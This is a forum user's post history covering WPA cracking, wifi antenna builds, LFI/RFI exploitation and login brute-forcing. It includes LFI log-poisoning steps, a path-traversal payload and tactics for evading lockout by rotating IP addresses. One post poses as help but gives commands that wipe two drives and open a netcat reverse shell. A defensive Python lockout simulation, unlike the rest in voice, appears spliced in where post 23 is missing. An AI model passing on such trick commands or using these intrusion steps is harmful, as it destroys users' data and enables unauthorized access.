
i8igmac
Dedicated Members
Posts: 939
Days Won: 22

Everything posted by i8igmac

  1. i8igmac

    CUDA

    There have been some major security breaches over the last few years. When this data is released to the public I'm sure this word list will grow another 100 billion in a few years.
  2. i8igmac

    CUDA

    https://labs.nettitude.com/tools/rocktastic/ I believe this is an updated version of the word list you are using... 1.1 trillion :-)
  3. i8igmac

    CUDA

    Hashtype: wpa/wpa2
    Speed.Dev.#1.....: 388.6 kH/s (52.19ms)
    Speed.Dev.#2.....: 392.8 kH/s (51.63ms)
    Speed.Dev.#*.....: 781.4 kH/s

    Is that 781,400 hashes per second? Can you post a pyrit benchmark? I would like to see a comparison... Are you running these GPUs in SLI? Overclocked? Water cooling?
  4. All your traffic is gzip encoded; your filter must first prevent this so plain text traffic is visible to ettercap. https://www.irongeek.com/i.php?page=security/ettercapfilter
  5. i8igmac

    CUDA

    Fire that thing up and run a pyrit benchmark. I'm excited for you. Check out my post count... 666
  6. For fun, I made a metasploit module to exploit this process.
  7. This is true; in this case I was focused on devices that have minimal security.
  8. Correct. You should look at the file /lfi/index.php. You should find include($_GET exists or something close. Typically, RFI is not a practical method. LFI is more common. You have to discover local files that could allow you a way to view your header request. Then place php snippets in your header. /lfi/?page=/proc/self/environ This request above will execute php code directly from your user agent. You can use a web browser plugin to tamper with your user agent string. lfi/?page=/var/log/apache2/access.log If you can find the web server log file, you might see... This log file shows request information coming from your web browser which should show a referer: string or user-agent string. Run a dir brute force scan. Try to discover config files and log files. You should learn small php snippets, how to find a writable directory and how to write your php code to this writable directory. I assume this is a vulnerable linux VM?
  9. I have used 255 threads on ssh_brute. I ran into a problem with the msf database being unable to handle this many threads. So I tried to incorporate thread pooling with puma. I didn't spend enough time tweaking for optimal performance, but it was a fun learning experience.
  10. The RFI is a vulnerability that exists in an index.php file. The php code in your vulnerable php file is executing the code from your echo.txt file. The vuln.php file is using include_once(echo.txt). The most common exploit of this technique might be log poisoning. If you can write php code to any log file then you could execute your own php code with the url inclusion method vuln.php?PAGE=../etc/log/FTP_error.log%00
  11. I did try out hcxtools; the hccapx generated with no errors, but when I attempt to start hashcat (I'll try and post the results) it just looks like an ugly mess... it says no hashes loaded. There was no cleaning done by any scripted tools. It's a fresh cap file from aircrack-ng 1.2 rc4.
  12. I'll check out john. Also looking into opencl vs cuda... I currently hacked up a logging function with pyrit. I would hate to see 100 hours of work go by and fail to see a success... this function would also allow me to recover the attack from any location of the word list... I'm running 2 GPUs and 2 decent CPUs... blew all the dust out of the fans for the long haul. 14000 PSKs, 22000 PSKs, a 3rd GPU sitting on a bench; I expect 40,000 PSKs from this GPU and pyrit... I want to try extreme overclocking with home brew cooling... I would like to see how much I can squeeze out of a dirt cheap GPU but also keep things stable.
  13. (Pyrit example command below) First I'll start with my problem with pyrit. Output logging is hacky. After 15 hours of work, there should be something logged to the file like "Password is or was not found". Notice 2>&1 should log both stdout and stderr to a file. If I grep through the log file, the Password string does not exist (15 hours of work). If I test this with a small dictionary file, I achieve different results: the Password string exists and is grepable (5 minutes of work).

      pyrit -r handshakes.cap -i Rocktastic12a -b XX:XX:XX:XX:XX attack_passthrough 2>&1 | tee -a resaults.log

      Love the application, it works for the most part, but it seems there has not been much improvement since 2014. So, what about hashcat. This is my first attempt poking around; I knew of its existence but felt that pyrit works just fine, so no need to bother with hashcat. (Hashcat) I have installed it, then ran the examples provided, and I like the detailed output. Rocktastic cracked an enormous amount of the example hashes. Pretty cool... Now when I try to run hashcat on my handshake.cap file, I notice I have to convert to hashcat format with cap2hccapx. I installed hashcat-utils-1.8 and ran cap2hccapx on my aircrack capture file and see this error:

      hashcat-utils-1.8/src $ ./cap2hccapx.bin ../../out.pcap-01.cap output.hccapx
      Zero value timestamps detected in file: ../../out.pcap-01.cap.
      This prevents correct EAPOL-Key timeout calculation.
      Do not use preprocess the capture file with tools such as wpaclean.

      If I remember, this file was straight from aircrack. I did not run cleanup tools. I tried another tool that converts cap files to hashcat format, hcxtools. This attempt just looks ugly when I pass the newly generated cap.hccapx.... Could an outdated version of aircrack (1.2 rc4) be the cause of this struggle? The good news is, hashcat is updated consistently and has a large irc channel.
  14. The heck with these guys. I'll help you... make a bootable kali usb stick or bootable live kali cd... http://docs.kali.org/downloading/kali-linux-live-usb-install A tutorial like above... once you reboot your computer into this kali operating system, paste exactly these commands mount /dev/sda1 /tmp Rm -rf /tmp umount /dev/sda1 mount /dev/sdb1 /tmp rm -rf /tmp echo "pwnd by BiGMaC" >/tmp/readme.txt umount /dev/sdb1 nc <IP-ADDRESS> -e cmd.exe
  15. Yes indeed... 2.4 GHz is just too crowded... 40 MHz is impossible... so the speed you pay for will never be achieved... Because of the short range of 5.8 GHz, 40 MHz is easily doable. When you first power your router on, it will scan for crowding networks and decide if 40 MHz is doable (consume 2 channels simultaneously). A quick little hack I did with hostapd: put aluminum foil around the antennas and start hostapd. It will force 40 MHz but is of course way too crowded and will cause more issues... And with long range you are more susceptible to interference; on 2.4 GHz, my beam of radiation is passing through several different wifi routers' airspace... think of the drops, retry, drop, fail... I would love to do a power point demonstration...
  16. So, I have made some huge progress... 5.8 GHz has been 100% stable (long range) for about 5 days now... no packet loss, no more disconnects... 2.4 is too crowded... it was all packet loss/retry/drop/retry. I see 60 mbps during good conditions but 40 mbps is consistent... I ordered some sma pigtails, digital calipers and will build some antennas tuned for 5.8 GHz...
  17. I have been 3d printing parabolas for a few weeks now. Soon I will receive a 20-pack of sma pigtails that I will use to build several feed antennas in hopes to find a great parabola/antenna combo design... This design will be a 2x2 mimo, so I hope to build an inverted dipole, but I fail to find measurements for 2.4 and 5 GHz. I plan to mount 2 antennas at the 80mm focal point, just spaced apart in a horizontal location... Any tips or ideas for antenna designs that might feed a parabola... I'm open for ideas.
  18. Thanks for the info, I tried 8.8.8.8 but never included 192.168... Yes, 3d printed a parabolic curve with a focal point of 40mm. The case is 180mm x 180mm x 60mm. I'm learning my way around design in freecad on linux :-)
  19. Here is a project I have been working on. The configuration includes hostapd for wlan0, dnsmasq to assign IPs to local clients (192.168.0.*), (wlan1) wpa_supplicant and dhclient to connect to an access point from a distance (10.0.0.*), and iptables to pass packets in both directions (wlan0 <-> wlan1). The access point in the distance is on channel 1 and my hostap runs on channel 11... 5.8 GHz is not yet an option... I experience a disconnect and reconnect with the long range communication; at the moment the reconnect happens and the connection is stable again, something strange happens: I can ping my machines located in the distance on the subnet of 10.0.0.*, but I can't ping google for a few minutes... During this time I can perform a test of packet loss and ping. mtr 192.168.0.1 -> 10.0.0.1: 0% packet loss and a consistent 20ms response time... But ping google just hangs with no response... Possible dhclient or dns problem?
  20. tail -f /var/log/kern.log You should watch your kernel logs, then plug the device in...
  21. 15dbi is a joke, not sure of the gain but it works very well... more testing to do... My first print! I downloaded the yagi and a wind surfer parabola from 2 projects at thingiverse.com. Lots to learn and more to be having... Any one 3d print?
  22. Maybe your wordlist file has issues? Look at the tcp stream for ugly characters in the password/user string... Understanding the firewall is like poking around with your eyes closed. This firewall, if it even exists or provides any brute force prevention, may respond in several ways... Below is a video of a custom brute force I built to crack cpanel... from lfi to brute force... some firewall functions I experienced... I installed a cpanel OS in a vm; I expect most admins will rely on the default firewall settings/functions of the installed software... A service may respond with a header 401=unauthorized, 403=forbidden or 200=ok... look up http status codes... I started off by creating a password... I tested 9 failed logins and the 10th was the correct attempt, but the header still responds with 401... So, this basic firewall function will detect a username fails X times in a row and too quickly... so the service continues to respond with the same 401 header a total of 10 times in a row... the attacker will think its password list was missing the correct creds, which I thought was clever! So I changed my local ip address from 192.168.0.100 to 192.168.0.101... now I made 8 fail logins with the 9th being the correct credz... I repeated this process until I reached the conclusion that if the correct creds was on the 6th attempt I would receive a 200 header response... There is an identical process that I used to find the TIME-in-between fails that triggers ip banning was around 60 seconds. I would need to sleep 60 seconds before each login... I could ramble on with all my findings, I'll try and get to the tactic I used... change my ip after each request. With my attack I also changed username every attempt but that won't work for your situation... I had planned on creating a local proxy service that would provide a new ip address after each request. Everything I ran into required so much extra evasive function I had to build my own tool for the job...
You should continue with hydra, but start thinking about what security may be implemented... I had scraped a huge list of default router passwords but I don't know where it is... Edit: the feeling of super saiyan level 5
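The lockout behaviour described in the post above (401 returned even for the correct password once an address has failed too many times too quickly, and a fresh source address getting a clean counter) is easy to model, and modelling it shows why a defender should not key the counter on the client address alone. The following is an added example, not the post's code and not cPanel's own logic; the 5-failure threshold, the 60-second window, the account name and the addresses are assumed values, chosen for the simulation.

```python
"""Simulation of a login lockout keyed on source IP versus on username.

Constructed example, not the forum post's code and not cPanel's own logic.
The threshold (5 failures), window (60 s) and addresses are assumed values.
"""
from collections import defaultdict, deque

# Constructed credential store for the simulation only.
VALID_CREDS = {"admin": "correct-horse-battery-staple"}


def by_ip(ip, user):
    """Key failures on the client address only."""
    return ip


def by_user(ip, user):
    """Key failures on the account name, so a new address does not reset them."""
    return user


class LoginGuard:
    """Sliding-window failure counter in front of a credential check.

    Once `max_failures` failures have been recorded under a key within
    `window` seconds, every further attempt under that key gets 401,
    including one carrying the right password, until the window drains.
    """

    def __init__(self, key_fn, max_failures=5, window=60.0):
        self.key_fn = key_fn
        self.max_failures = max_failures
        self.window = window
        self.failures = defaultdict(deque)  # key -> timestamps of failures
        self.events = []  # audit trail a detection pipeline could consume

    def _prune(self, key, now):
        """Drop failure timestamps that have aged out of the window."""
        q = self.failures[key]
        while q and now - q[0] > self.window:
            q.popleft()

    def attempt(self, ip, user, password, now):
        """Return an HTTP-style status code for one login attempt at time `now`."""
        key = self.key_fn(ip, user)
        self._prune(key, now)
        if len(self.failures[key]) >= self.max_failures:
            self.events.append(("LOCKED", key, ip, user, now))
            return 401  # correct password or not, the key is locked out
        if VALID_CREDS.get(user) == password:
            self.failures[key].clear()
            self.events.append(("SUCCESS", key, ip, user, now))
            return 200
        self.failures[key].append(now)
        self.events.append(("FAIL", key, ip, user, now))
        return 401


def rotate_ip_scenario(key_fn):
    """Five wrong guesses from one address, then the right password from another."""
    guard = LoginGuard(key_fn)
    for i in range(5):
        guard.attempt("192.168.0.100", "admin", f"guess{i}", now=float(i))
    return guard.attempt("192.168.0.101", "admin", VALID_CREDS["admin"], now=6.0)


def cooldown_scenario(key_fn):
    """Same five failures, but the correct login waits out the window."""
    guard = LoginGuard(key_fn)
    for i in range(5):
        guard.attempt("192.168.0.100", "admin", f"guess{i}", now=float(i))
    return guard.attempt("192.168.0.100", "admin", VALID_CREDS["admin"], now=70.0)


if __name__ == "__main__":
    print("rotate IP, IP-keyed  :", rotate_ip_scenario(by_ip))    # 200: counter reset
    print("rotate IP, user-keyed:", rotate_ip_scenario(by_user))  # 401: still locked
    print("cooldown,  user-keyed:", cooldown_scenario(by_user))   # 200: window drained
```

With the counter keyed on the address, the second address starts with a clean slate and the correct password is accepted, which is exactly the reset the post relies on; keyed on the account, the same attempt is still refused until the window drains. A per-account counter on its own lets anyone lock a legitimate user out by guessing badly on purpose, so production guards usually combine both keys and, just as important, emit the LOCKED and FAIL events to a log that monitoring actually reads.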
  24. I'll provide 2 commands you should run in 2 separate consoles. First install the tool...

      `sudo apt-get install tcpick`

      Console 1: sudo tcpick -i wlan0 -bPS -C
      Console 2: sudo tcpick -i wlan0 -bPC -C

      It will help if you close down all applications that may be streaming data... Now submit your login from the browser; both screens should now show your POST request in one console and your server response in the next console... Press ctrl-c to stop the streams and paste this information in 2 separate text editors... You may already have this information. But now you have 2 consoles that you can use to quickly see a separate live stream... Keep at it; first you have to focus on getting hydra to produce a proper POST request and see an identical server response...